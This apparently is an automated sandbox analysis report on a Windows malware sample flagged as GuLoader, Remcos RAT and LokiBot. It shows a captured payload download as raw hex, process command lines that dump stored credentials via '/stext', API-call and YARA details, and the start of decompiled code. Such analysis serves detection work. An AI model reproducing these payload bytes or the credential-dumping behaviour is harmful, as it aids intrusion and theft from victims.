Jan 2, 2022 02:28:02.499038935 CET	8009	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Sat, 01 Jan 2022 18:55:36 GMT Accept-Ranges: bytes ETag: "ff14be2941ffd71:0" Server: Microsoft-IIS/8.5 Date: Sun, 02 Jan 2022 01:27:24 GMT Content-Length: 474176 Data Raw: a5 83 f2 18 e2 01 47 80 7b 48 56 0b 94 e4 ee fa 57 e3 9a 86 ea b5 07 7e f9 ae 3f a4 43 9c 7d db 34 90 9c 53 99 2d 09 5c 17 a9 43 9a 6b f6 84 4a 7d f0 ec 9a 4f 85 09 94 9c 28 d9 41 c6 f7 ce 09 58 d9 1b db 21 3a 8b b1 84 d8 73 2f 3b d9 b8 29 25 77 92 4d e8 b7 93 4f a4 73 75 4b 12 a2 dc 5a b7 fa fd fe e6 fa e3 18 f3 fc 3a 15 bc b6 a3 5f 77 3f f9 56 94 29 ab e6 75 c5 26 4e f5 de 4e d0 8c a4 99 c0 80 4c de af 55 4a e4 0a 7d 3a 64 8e da be 43 c8 c8 e0 91 18 40 f9 de f0 d4 76 c1 70 14 df 50 bb 34 26 4f a7 76 74 72 4f fe dc ec 86 40 ab ca f0 90 c8 94 b3 2b 5a 92 64 14 45 55 3b 4a 29 a7 f4 7d 7a 47 0f ce 99 0b 4d 27 61 12 59 49 16 f7 89 bc 89 d7 4a 31 f7 7f 16 fb a4 8f f7 15 47 a8 6c 04 1d 03 81 91 3c 0c 43 65 2b 96 2e 89 33 1e 98 dc 9b 89 67 9a 94 a3 ce c6 6b 06 92 9b 82 d9 d3 91 f4 89 40 b7 27 27 c7 3a 8f 98 fe 82 d2 6a 55 d2 a8 e2 d2 d4 a6 c7 fb fd e6 fe ee ee aa 35 26 58 98 17 a6 3d 48 24 32 ed 92 a8 df 65 a6 48 44 04 7f d0 72 87 e3 7a e8 49 59 b7 5b 8b 5e 13 39 95 3c 0b ec 89 d9 7d 85 9e 55 40 6a 5c d7 87 84 fb b3 5e 64 31 e0 80 a7 4a 5f 42 35 82 32 6e 9a dc d4 f4 76 85 3c 94 b2 9f 59 5c 3a 0a 6f bb 5e 5d b5 76 f4 4c c0 e5 b4 45 57 0d eb 0f 9c 88 47 53 b9 86 d0 65 3e 0f f4 d8 40 ae e7 c4 cb cc 3e 58 2d 69 67 82 dd 55 30 b7 76 1c 01 f7 99 50 3e d6 e5 a0 5c 3e d8 7d 54 fa cd 66 19 a3 64 cc 6b d5 7a 9c bc 0f d1 5a 17 b8 be 01 db a4 e7 3e ac ae b4 b4 36 5d c6 32 26 a5 c0 c0 4f a1 f8 c4 80 11 1c 04 9c 38 50 29 04 43 40 ec 6d 48 c2 91 f4 f9 27 d9 c9 d7 18 32 7c 42 be f6 66 a7 fd 38 d6 5f b9 48 9d 85 e9 78 59 32 0b 2d 85 d1 89 6c 1d fc 75 6c 8c fe d7 83 d9 57 ab 67 2d 16 64 59 6e 72 1d 66 82 4a 78 22 e4 95 d9 db 9b 3a 6d 80 68 04 1d 3c 77 00 15 6f ad 2c 15 87 3e fe e6 be 14 d7 84 83 44 e0 fb e7 fa 5d c2 4c d8 72 4c 74 88 a0 68 a8 d2 a4 dd be c0 5c 1f 70 ec d6 a8 29 d6 ad 25 d8 4b 0f dc af 2a b8 4e fe 71 f6 b6 46 2c 32 72 de bd bf f5 4a 58 68 fc fb 27 ad ab 0c b1 df 0d b6 d0 65 d0 66 0a 33 b5 be 4d 9d 79 ff 1f 0e fb b9 44 70 bd e4 b1 55 29 f0 64 7a 39 f7 b8 d4 4b 25 fe d6 f5 cd 36 bb 12 20 c1 18 b5 f9 f8 b9 01 18 86 47 4e 33 fb b4 d4 2e 26 ed 41 41 11 f3 7a 95 56 92 ee ae 86 55 a6 16 c1 0a 81 f1 68 ee 04 c6 48 61 b5 64 5f c8 a7 6f 90 dc a8 3e bf d4 2a 78 8d f1 17 1b 21 db 19 ea af 1e d6 7a 8c 9a ac 47 f9 fb cd b5 8e 0c 52 f8 6b 47 b0 91 f2 2e d8 15 53 06 f3 bf e5 40 5a 50 89 9b ce 24 7e 2c a5 70 be ad ff e5 a1 db b6 92 37 67 03 66 e0 1d 44 e4 2e cf be 87 bc 08 97 bc 5d 6e 2a db 28 f1 b9 2a 8d 76 cf 4c ec ec ff 92 c2 30 11 60 2d 21 14 5e a4 17 b4 8d de 32 0e b6 db 64 54 38 a8 55 03 d9 54 af 1f a2 c5 30 e6 ae 84 75 42 f9 08 90 ad 8b bb cc d7 a6 ba f5 1a b1 d9 6b b4 ae a8 5e 92 7a d9 5c 4f ce ed be 9f 0d 4a b7 46 9a b2 f2 d2 47 83 58 c6 14 e1 7d fc bd 62 a7 32 e6 0a a7 9d 47 bb 4d a9 9d 83 a2 dd 0a f8 4d d2 d0 d7 ea 42 66 ae 5a 1c 71 ee 53 77 ef 78 19 d1 93 32 92 de 05 c7 da 0b 2c c0 9a d2 bb e5 f7 5f 59 76 f5 15 83 8b db 22 3a 8b b1 80 d8 73 2f c4 26 b8 29 9d 77 92 4d e8 b7 93 4f e4 73 75 4b 12 a2 dc 5a b7 fa fd fe e6 fa e3 18 f3 fc 3a 15 bc b6 a3 5f 77 3f f9 56 94 29 ab e6 75 c5 26 4e fd df 4e d0 82 bb 23 ce 80 f8 d7 62 74 f2 e5 46 b0 1b 30 e6 b3 cd 63 b8 ba 8f f6 6a 21 94 fe 93 b5 18 af 1f 60 ff 32 de 14 54 3a c9 56 1d 1c 6f ba 93 bf a6 2d c4 ae 95 be c5 99 b9 0f 5a 92 64 14 45 55 3b 58 d4 da c0 2b e6 54 68 98 05 18 93 a5 1d 47 3e 43 43 1a Data Ascii: G{HVW~?C}4S-\CkJ}O(AX!:s/;)%wMOsuKZ:_w?V)u&NNLUJ}:dC@vpP4&OvtrO@+ZdEU;J)}zGM'aYIJ1Gl<Ce+.3gk@'':jU5&X=H$2eHDrzIY[^9<}U@j\^d1J_B52nv<Y\:o^]vLEWGSe>@>X-igU0vP>\>}TfdkzZ>6]2&O8P)C@mH'2\|Bf8_HxY2-lulWg-dYnrfJx":mh<wo,>D]LrLth\p)%KNqF,2rJXh'ef3MyDpU)dz9K%6 GN3.&AAzVUhHad_o>x!zGRkG.S@ZP$~,p7gfD.]n(vL0`-!^2dT8UT0uBk^z\OJFGX}b2GMMBfZqSwx2,_Yv":s/&)wMOsuKZ:_w?V)u&NN#btF0cj!`2T:Vo-ZdEU;X+ThG>CC
Jan 2, 2022 02:28:02.499066114 CET	8011	IN	Data Raw: ee f8 7d 03 15 96 f7 77 ae fe 3a 9c c9 34 fe a5 eb 0a 81 f8 41 de d8 9b 4c e3 8f c0 49 a9 c6 3b fd 88 5e 59 b9 ff b7 f5 a8 62 66 05 f5 f6 28 14 8d b8 68 72 94 2b e7 30 f8 8d 79 cb 71 0f c7 e8 32 c8 97 f5 54 c4 3a 16 cd 6a 6e e3 89 2f 00 ca 78 14 Data Ascii: }w:4ALI;^Ybf(hr+0yq2T:jn/xRyd"bZLGz\`VTG)[f1C4apO0~n[\cD0E?WJ`p^@FV\|,gjL2+k 8Hm<#Km-i3_3@o
Jan 2, 2022 02:28:02.499083042 CET	8012	IN	Data Raw: b1 09 0c d4 ab 85 ad bc 10 b0 3b 29 50 50 b5 95 8e 28 c0 50 eb 5f 6b 2e b0 82 14 9a 5f f1 d0 9a e1 59 97 7e b9 2d 43 c9 30 48 97 51 e4 70 d7 1e ec c5 66 39 43 15 ea 52 de ce 05 7e a1 df f3 47 da d9 ca d8 c5 92 2b 32 f3 e4 97 09 7d a2 57 f9 be ca Data Ascii: ;)PP(P_k._Y~-C0HQpf9CR~G+2}W><6n?5_#\|?GY0x\|yPmD%AK##rV4o!V4`%h?eOk%Dj)JE^go2XGDm
Jan 2, 2022 02:28:02.499106884 CET	8013	IN	Data Raw: de d8 9b 24 b9 71 8a e6 44 93 10 b9 88 c6 72 03 7e 13 5f 23 4c 6e 26 03 75 a2 c8 b6 3f 3e 5b df d9 8d b0 a1 4e 13 02 dc 35 bd a9 36 fb 36 fe 1a 45 6c 83 f4 82 7b ed c9 7e e1 6a a4 d2 c4 20 48 bc 72 37 40 7e 4c fe b8 2f 9c da dd ac 96 c4 27 15 63 Data Ascii: $qDr~_#Ln&u?>[N566El{~j Hr7@~L/'cQ\|NyPjx5>a*cvQ&4\m^&AMZGz:,9%{(VBdQ.):gMQR2v.?%U\|<}y
Jan 2, 2022 02:28:02.597301960 CET	8015	IN	Data Raw: 16 2a 26 87 41 2b 10 5b 72 91 96 bc 59 97 7e b9 f7 45 4a 5e 89 a6 e3 17 3f 3a 3c 3b dd 64 35 c9 ff 86 93 dc a8 b5 74 3c 34 7a 8d f1 47 90 ee 73 0f e8 6f 30 e1 f4 3a ee df 47 a0 92 4b 75 fa 2b 14 72 2e 4f 3f 5a a2 c6 eb 17 53 06 78 4f 6e 8b d7 15 Data Ascii: &A+[rY~EJ^?:<;d5t<4zGso0:GKu+r.O?ZSxOnu&zlBiP7N>Rh6qnH"d7h#EZ%J.R$lCR\^kZvG2~2U\2uVRw
Jan 2, 2022 02:28:02.597328901 CET	8016	IN	Data Raw: a2 9e 19 a0 bf ba bd 76 99 72 fb 2a 1a cf f8 1e ec fe 91 56 f8 02 37 91 34 f1 eb df f8 d1 9c d7 f0 01 df 78 e3 52 48 da f5 53 29 4f 89 c8 55 31 c0 3f 78 d0 71 a6 57 5f 0b ce e8 2a 75 32 78 94 0b f3 6a 63 68 13 39 95 d7 25 86 d9 63 08 89 3a 9f 44 Data Ascii: vrV74xRHS)OU1?xqW_u2xjch9%c:Dj/NL+h.OMj#rXMU&\|k(XKJhi@FsPz9mRo:%+YiT(41jW?ZD@c?>M?*hchoDI_7(
Jan 2, 2022 02:28:02.599652052 CET	8018	IN	Data Raw: a6 83 c6 81 1a 3c 4a 3c aa b7 ca ef 96 6f 57 e5 36 bc 13 01 b3 04 bc 1f 30 ee ca 94 e6 77 61 e1 f4 59 15 20 b8 7a 0f c3 4a fb 04 c9 31 83 61 4b 6e 0d 71 e1 d5 0d 5d ae 7d ed 40 0f db 65 cd 31 51 76 e7 54 98 c6 7d 72 69 2c cd be 19 f9 73 4c 99 1f Data Ascii: <J<oW60waY zJ1aKnq]}@e1QvT}ri,sL%p0]V=\|Qz0v~kesUNB86Q]A{NrM,&E3NQNzFm5zPF\|;\|AjTT2G)1`'/"E_-\|YrVPz
Jan 2, 2022 02:28:02.599713087 CET	8019	IN	Data Raw: 61 f9 79 15 01 4a 7d b1 1d 74 6c 8c 12 76 a4 25 d3 10 b9 bf f4 3e 06 01 8d a9 e5 50 e0 33 41 39 9a 77 d8 0f 95 ea a0 82 92 71 94 0f 4c cb 64 a1 ec b2 5d d4 cf 1b 26 63 2d 0e 1c bc d5 9a d0 35 95 23 a5 ee 9d 31 ba 0c d3 f1 fd d4 ba bf 50 db 6f 6b Data Ascii: ayJ}tlv%>P3A9wqLd]&c-5#1Pok#zmbM`2PZ+.N`{SFa<[$K_#."Y(kYZY[6'a\b4U^&S/FSc=n2)!Mw>VMb/qk"v3
Jan 2, 2022 02:28:02.599747896 CET	8021	IN	Data Raw: 72 84 1b e4 54 93 f1 63 6a 30 b1 f5 16 fe df 47 aa 40 92 bd dd e4 b1 0c 94 b8 4b e4 fe a5 a4 40 bb 2f 06 40 1a cb 94 db 51 73 ab c9 81 93 2c 35 02 08 85 1d 02 33 f3 86 1c 48 c0 2b ec 96 ac 14 ff f4 38 88 3a ca 21 ba 5d e5 67 d7 03 bc b1 01 46 ff Data Ascii: rTcj0G@K@/@Qs,53H+8:!]gF@o\/nzP>!$k%{/RTb~WMRbe7;Dy-F9<:q9!6'>y"Skf1!b!1[z-DnKEgNS>'I"yuM
Jan 2, 2022 02:28:02.599770069 CET	8022	IN	Data Raw: d5 11 2e 27 aa 45 51 30 7e fa 3f 04 e0 43 e3 48 db 3d 56 f7 7f e0 09 2f 3d 48 0b 98 d5 16 41 07 ed ac 85 f0 c0 c2 04 af 7d c7 35 e1 6e b6 bb d3 60 79 b0 68 1e 71 a0 bf 6d d0 d8 7a 65 a9 e8 0e 03 89 d8 6a 55 60 a6 d7 77 70 e6 bc 16 0d 4d fe 2f b3 Data Ascii: .'EQ0~?CH=V/=HA}5n`yhqmzejU`wpM/cpIWc%)#s Bf_+f%2_*47~tft<.X5RIKKyKdJ8PIO<FIO @6]DcPxGJ9!x`}5
Jan 2, 2022 02:28:02.599791050 CET	8023	IN	Data Raw: e0 c9 b2 83 af 2a 63 0d d1 33 79 53 6c f3 57 50 af 58 50 45 ce 45 c8 23 85 e2 70 fe 83 db 1d 22 50 14 60 c8 64 c2 a0 be df 6c e3 7b 44 1e 78 c9 18 c9 63 ac 91 d5 82 a3 bc b1 7a 72 03 c3 a4 df ac ff 92 df dd 35 52 ca b4 fc af 4f 33 06 43 36 c8 99 Data Ascii: *c3ySlWPXPEE#p"P`dl{Dxczr5RO3C6N$4\|U]$UGC:][A?o#T%xJ<w$3ByENV_ZNSwK92QuLK%CY`8)~suKD)-%m<

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: g4FtSOZMD9.exe PID: 7068 Parent PID: 5196

General

Start time:	02:26:17
Start date:	02/01/2022
Path:	C:\Users\user\Desktop\g4FtSOZMD9.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\g4FtSOZMD9.exe"
Imagebase:	0x400000
File size:	258048 bytes
MD5 hash:	81F377EDA4163DA1B74CAE83E38CED9F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: g4FtSOZMD9.exe PID: 5452 Parent PID: 7068

General

Start time:	02:27:06
Start date:	02/01/2022
Path:	C:\Users\user\Desktop\g4FtSOZMD9.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\g4FtSOZMD9.exe"
Imagebase:	0x400000
File size:	258048 bytes
MD5 hash:	81F377EDA4163DA1B74CAE83E38CED9F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.620873156.0000000001C23000.00000004.00000020.sdmp, Author: Joe Security Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000009.00000003.582459498.0000000001C39000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000000.462063926.00000000017A0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 2948 Parent PID: 5452

General

Start time:	02:28:02
Start date:	02/01/2022
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SysWOW64\svchost.exe
Imagebase:	0xe20000
File size:	44520 bytes
MD5 hash:	FA6C268A5B5BDA067A901764D203D433
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: g4FtSOZMD9.exe PID: 5524 Parent PID: 5452

General

Start time:	02:28:15
Start date:	02/01/2022
Path:	C:\Users\user\Desktop\g4FtSOZMD9.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\g4FtSOZMD9.exe /stext "C:\Users\user\AppData\Local\Temp\iwxzjjveuvjtvtlo"
Imagebase:	0x400000
File size:	258048 bytes
MD5 hash:	81F377EDA4163DA1B74CAE83E38CED9F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: g4FtSOZMD9.exe PID: 3920 Parent PID: 5452

General

Start time:	02:28:16
Start date:	02/01/2022
Path:	C:\Users\user\Desktop\g4FtSOZMD9.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\g4FtSOZMD9.exe /stext "C:\Users\user\AppData\Local\Temp\srdskbfyidbgfzzawoj"
Imagebase:	0x400000
File size:	258048 bytes
MD5 hash:	81F377EDA4163DA1B74CAE83E38CED9F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: g4FtSOZMD9.exe PID: 5972 Parent PID: 5452

General

Start time:	02:28:16
Start date:	02/01/2022
Path:	C:\Users\user\Desktop\g4FtSOZMD9.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\g4FtSOZMD9.exe /stext "C:\Users\user\AppData\Local\Temp\vtilcuqzwmtlifvenyefmr"
Imagebase:	0x400000
File size:	258048 bytes
MD5 hash:	81F377EDA4163DA1B74CAE83E38CED9F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: g4FtSOZMD9.exe PID: 7068 Parent PID: 5196 g4FtSOZMD9.exeCOMMON

Executed Functions

Function 0228DDDD, Relevance: 11.5, APIs: 2, Strings: 4, Instructions: 1019COMMON

Download Yara Rule

Strings

Ns9, xrefs: 0228B19B
1;4_, xrefs: 0228B423
:u->, xrefs: 0228BF85
A, xrefs: 0228DFA0

Memory Dump Source

Source File: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: Ns9$1;4_$:u->$A
API String ID: 1029625771-1023832662
Opcode ID: 358e915a59356a390354bba19bc6eacb0beba56ddda57fe4de0b0821d6b465bb
Instruction ID: 7d39d5d52106a656f6e8a7e6f90de074029ebef29164717f8ce6fe9fb6791119
Opcode Fuzzy Hash: 358e915a59356a390354bba19bc6eacb0beba56ddda57fe4de0b0821d6b465bb
Instruction Fuzzy Hash: 16920B7261438ADFDB74AF78CD457EA7BB2BF55310F06412AEC899B254D3708A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0228D09B, Relevance: 11.2, APIs: 2, Strings: 4, Instructions: 707fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(0000009D,92F9BD59), ref: 0228D344

Strings

Ns9, xrefs: 0228B19B
1;4_, xrefs: 0228B423
A=!, xrefs: 0228D0A5
:u->, xrefs: 0228BF85

Memory Dump Source

Source File: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: Ns9$1;4_$:u->$A=!
API String ID: 823142352-4290075044
Opcode ID: bd8474843301035e726f17e04d86aa7455d9bb584381ea4b2f74ea9ef8281778
Instruction ID: cccc0e8aad65b85bd94bdf8c6aec661744edfeb3b7fddc66436c1f0b960c0aed
Opcode Fuzzy Hash: bd8474843301035e726f17e04d86aa7455d9bb584381ea4b2f74ea9ef8281778
Instruction Fuzzy Hash: EB621A7261938ADFCB74AF74C9457EABBB2BF55310F06412EDC899B254D3708A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02296E2A, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 204COMMON

Download Yara Rule

Strings

Ns9, xrefs: 0228B19B
1;4_, xrefs: 0228B423
:u->, xrefs: 0228BF85

Memory Dump Source

Source File: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID:
String ID: Ns9$1;4_$:u->
API String ID: 0-1162790164
Opcode ID: 5e31026dfc561fd0bdb9b6b0042fa1d762ec429d49e36c678e1355d9c9f13809
Instruction ID: ab05cc7cf630bef5f5525dd3437a6f8e8536cb5db1d644b9d5c7f52b0d4e9b8b
Opcode Fuzzy Hash: 5e31026dfc561fd0bdb9b6b0042fa1d762ec429d49e36c678e1355d9c9f13809
Instruction Fuzzy Hash: 4881F5B1524349CFDF399FB8C9A57EABBB1BF45310F51822ACC4A8B658D7308641CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02285A4E, Relevance: 3.3, APIs: 2, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4112c8ab2d39f59ab0f5951ae592ba54e6537ea46257946137d1b05157fa1643
Instruction ID: 0ffb06277e036904cad3f2f635b7e02742ae1c1109a8af73658b4e609899fdba
Opcode Fuzzy Hash: 4112c8ab2d39f59ab0f5951ae592ba54e6537ea46257946137d1b05157fa1643
Instruction Fuzzy Hash: E4B12A30A242C1ABD7355F7C85553A2BFE5EF8AA04B19B09DF48986D47D323D067CB05

Uniqueness

Uniqueness Score: -1.00%

Function 02285E30, Relevance: 2.2, APIs: 1, Instructions: 689registryCOMMON

Download Yara Rule

APIs

RegSetValueExA.KERNELBASE(A76BAD07), ref: 02285F9D

Memory Dump Source

Source File: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 8bf6e6e7618f7a28edf46b97d6418cdbb1084db8e0f5205236c2b3c0106abac0
Instruction ID: cc0f9ad5a912766efc1adfe8979a718e3b315adb475b95602f72a023dbf39227
Opcode Fuzzy Hash: 8bf6e6e7618f7a28edf46b97d6418cdbb1084db8e0f5205236c2b3c0106abac0
Instruction Fuzzy Hash: 7C42F134F642C67ACB354A7C82113A2BFAAFE8AE04328F19DF489D5D16C353D1678B45

Uniqueness

Uniqueness Score: -1.00%

Function 022866C3, Relevance: 1.8, APIs: 1, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b44afb6bfcc1c46aadc6d3d0760736486a49d5df8888a248bd59043de1c7287d
Instruction ID: e64ccf349f642b36c309353baf8a6268256e8f54eb3de9d321ad69778fac05f2
Opcode Fuzzy Hash: b44afb6bfcc1c46aadc6d3d0760736486a49d5df8888a248bd59043de1c7287d
Instruction Fuzzy Hash: 67A1E634F693C27AD7315ABC82113B2BFAAED8AA00318F1DDF48995D5AD353D0278B45

Uniqueness

Uniqueness Score: -1.00%

Function 02293C6F, Relevance: 1.8, APIs: 1, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 50f44e34fdc31c20ef5314d715fdecd32bdfb47611276dcfd845318ef0eb31f6
Instruction ID: fa24b3db0e121bfb2811a95bdfa7fb3bec218c2cdb68b930399f94c1bfaf7b52
Opcode Fuzzy Hash: 50f44e34fdc31c20ef5314d715fdecd32bdfb47611276dcfd845318ef0eb31f6
Instruction Fuzzy Hash: 24A14371A2435AEFDF34DEA8CC947EA77A2EF49300F15412EDC899B248D3705A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02285B36, Relevance: 1.7, APIs: 1, Instructions: 229registryCOMMON

Download Yara Rule

APIs

RegSetValueExA.KERNELBASE(A76BAD07), ref: 02285F9D

Memory Dump Source

Source File: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 9ffc843db98cb60e5d87d424d801e956145dd9b413b1990c5bdebcea12c11158
Instruction ID: 3f6356c5a5c200712391c779c683e08ed01102faf57939882f2aa3b609b42e1c
Opcode Fuzzy Hash: 9ffc843db98cb60e5d87d424d801e956145dd9b413b1990c5bdebcea12c11158
Instruction Fuzzy Hash: 7E912731A282C1ABD7359F7CC5553E2BFE5EF89B00B19A49DF88986D06D322D167CB01

Uniqueness

Uniqueness Score: -1.00%

Function 02285B30, Relevance: 1.7, APIs: 1, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61f165758f026e62e9eed7bab679b6bd7fd26fcf9198a143662dd8a50e1b307e
Instruction ID: 54f845b5af677574deaea01198684a4ae0d3aa53e0a300ec98791e3c9ffe42ab
Opcode Fuzzy Hash: 61f165758f026e62e9eed7bab679b6bd7fd26fcf9198a143662dd8a50e1b307e
Instruction Fuzzy Hash: C5814831A283C1ABC7359F7C85553A2BFE5EF4AB00B19A49DF48986D46D322D067CB01

Uniqueness

Uniqueness Score: -1.00%

Function 02283939, Relevance: 1.7, APIs: 1, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cca4ca6d694b11e8a56d67e0311135335760c23ae92a4834126bca1289f88893
Instruction ID: 9d5982aa3ab2442a57e7f3eca0558cf1358e9007e665a3aee04af484ea47f011
Opcode Fuzzy Hash: cca4ca6d694b11e8a56d67e0311135335760c23ae92a4834126bca1289f88893
Instruction Fuzzy Hash: 136154314297C9DFCB25EFB8C8882D97FA1EF4A310F0842DECA548B596D3359642CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0228DACD, Relevance: 1.6, APIs: 1, Instructions: 71memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(784DA5CA), ref: 0228DB34

Memory Dump Source

Source File: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 8f085cb3251eb690e3b12d70b4c15188954d8ebc49261d1cdc041781965c7a54
Instruction ID: 4e9b503ae1e548dd3f4f990f5553b0c59f76ed223799a3a96a48c898d5edd61b
Opcode Fuzzy Hash: 8f085cb3251eb690e3b12d70b4c15188954d8ebc49261d1cdc041781965c7a54
Instruction Fuzzy Hash: 1E210434625281AFC731DF78CC007D63BA6AFCA704F18D259E848CA6A8D732C11ACB40

Uniqueness

Uniqueness Score: -1.00%

Function 02296762, Relevance: 1.5, APIs: 1, Instructions: 40nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(3942E2C0,?,?,?,?,022953C5,-E2E595EA,0228AB0F), ref: 02296990

Memory Dump Source

Source File: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 3533e2aefcb2090a03fd366292922f87d543eeffb6bdc63c1ce88328ba005480
Instruction ID: f91b990d734c08386a560a3ad7ae6f5560aeaaf6826fafb5a4230b40c56b83eb
Opcode Fuzzy Hash: 3533e2aefcb2090a03fd366292922f87d543eeffb6bdc63c1ce88328ba005480
Instruction Fuzzy Hash: 160117716052885FEB34CE58CD547EEB6E6ABD5700F55802ED85DDB304DA709F05CB11

Uniqueness

Uniqueness Score: -1.00%

Function 022828ED, Relevance: .4, Instructions: 363COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee5e363b01685035b0825eba422e5e25743e7cd270f27fd79c57e553b1de4e5c
Instruction ID: 55a3d5cb40a5f054bc5612ad5f26457937f7c246d080767f3c762f1a6160a815
Opcode Fuzzy Hash: ee5e363b01685035b0825eba422e5e25743e7cd270f27fd79c57e553b1de4e5c
Instruction Fuzzy Hash: E1D15E30A252C2AAD7355F7C85103E27FB5EF4AB04B28B29DED99DAD56C322D053CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0042A294, Relevance: 377.8, APIs: 180, Strings: 35, Instructions: 1528
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E0042A294(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v28;
				short _v32;
				void* _v36;
				intOrPtr _v40;
				signed int _v44;
				void* _v48;
				void* _v52;
				signed int _v56;
				signed int _v60;
				void* _v64;
				signed int _v68;
				short _v72;
				char _v76;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr _v96;
				void* _v100;
				intOrPtr _v104;
				char _v108;
				void* _v112;
				void* _v116;
				char _v120;
				char* _v132;
				char _v140;
				void* _v144;
				char* _v148;
				short _v152;
				char _v156;
				signed int _v160;
				void* _v176;
				short _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				char* _v220;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				signed int _v244;
				intOrPtr _v256;
				char _v260;
				char _v264;
				char* _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				char _v280;
				intOrPtr _v284;
				char _v292;
				char* _v300;
				char _v308;
				short _v328;
				short _v332;
				signed int _v336;
				char _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				short _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				short _v408;
